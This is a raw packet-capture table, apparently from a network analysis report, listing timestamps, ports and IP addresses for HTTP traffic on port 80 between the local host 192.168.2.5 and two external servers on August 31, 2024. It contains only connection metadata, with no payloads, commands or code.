Aug 31, 2024 15:44:20.884011984 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.884032011 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.884056091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884057999 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.884068012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884077072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884093046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884102106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884118080 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.884145975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.884145975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.884591103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884602070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884612083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884663105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.884663105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.884744883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884756088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884766102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884776115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884784937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884815931 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.884866953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.888189077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888200045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888207912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888248920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888257980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888267994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888273954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.888279915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888282061 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.888309956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.888309956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.888354063 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.888379097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888389111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888397932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888406992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888417006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888427019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888437033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888439894 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.888439894 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.888446093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.888465881 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.888547897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.889019012 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.889029026 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.889039040 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.889071941 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.889125109 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.889213085 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.889224052 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.889234066 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.889281034 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.889811039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.889831066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.889841080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.889857054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.889873028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.889873028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.889888048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.889899015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.889909983 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.889947891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.889967918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.889978886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.890022039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.890038013 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.890049934 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.890086889 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.890119076 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.890130997 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.890141010 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.890177965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.890187979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.890198946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.890208006 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.890227079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.890239954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.890254021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.890264988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.890275955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.890288115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.890301943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.890328884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.890328884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.890346050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.890382051 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116472960 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.116502047 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.116519928 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.116530895 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.116545916 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.116545916 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.116549015 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.116561890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116573095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116580963 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.116606951 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.116609097 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116677046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116688967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116699934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116709948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116719961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116729021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116730928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116739035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116750002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116753101 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116753101 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116760015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116771936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116784096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116790056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116790056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116813898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116813898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116831064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116842031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116852045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116861105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116864920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116873026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116885900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116889954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116897106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116908073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116908073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116914034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116926908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116935015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116938114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116950989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116952896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116964102 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116969109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116977930 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.116986990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.116998911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117016077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117016077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117046118 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117046118 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117057085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117069006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117079973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117089033 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.117099047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117110014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117119074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117129087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117136002 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.117136955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117141008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117153883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117156029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117166042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117177963 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117177963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117189884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117189884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117295027 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117355108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117366076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117376089 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117386103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117397070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117407084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117418051 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117418051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117432117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117439032 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117439032 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117444038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117455959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117465973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117470026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117479086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117491007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117496014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117505074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117516041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117528915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117538929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117546082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117546082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117546082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117551088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117563009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117566109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117573977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117584944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117588997 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117597103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117605925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117611885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117611885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117616892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117625952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117629051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117640972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117647886 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117654085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117655993 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117666960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117680073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117687941 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117687941 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117691040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117710114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117710114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117710114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117722034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117733002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117743015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117746115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117758036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117768049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117774963 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117779016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117782116 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117782116 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117794037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117805004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117809057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117824078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117824078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117837906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117849112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117851019 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117851019 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117860079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117872953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117880106 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117880106 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117886066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117896080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117902040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117907047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117918968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117929935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117929935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117935896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117939949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117948055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117959023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117964029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117970943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117980003 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117985010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117995024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.117995977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.117995977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118016958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118029118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118035078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118035078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118038893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118051052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118058920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118058920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118062973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118076086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118086100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118097067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118105888 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118105888 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118107080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118105888 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118120909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118130922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118139029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118139029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118144989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118156910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118161917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118169069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118171930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118184090 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118201017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118201971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118221998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118232012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118237972 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118243933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118256092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118267059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118269920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118269920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118278980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118288040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118294954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118294954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118308067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118319988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118330956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118343115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118343115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118343115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118355036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118360043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118360043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118383884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118396044 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118407965 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118418932 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118422985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118427992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.118438959 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118448019 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.118448019 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.118449926 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118459940 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118469000 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.118469954 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118480921 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118486881 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.118499041 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118509054 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.118509054 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.118509054 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118529081 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118535042 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.118535042 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.118540049 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118551016 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118561029 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.118566990 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.118566990 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.118571997 CEST	80	49724	185.215.113.17	192.168.2.5
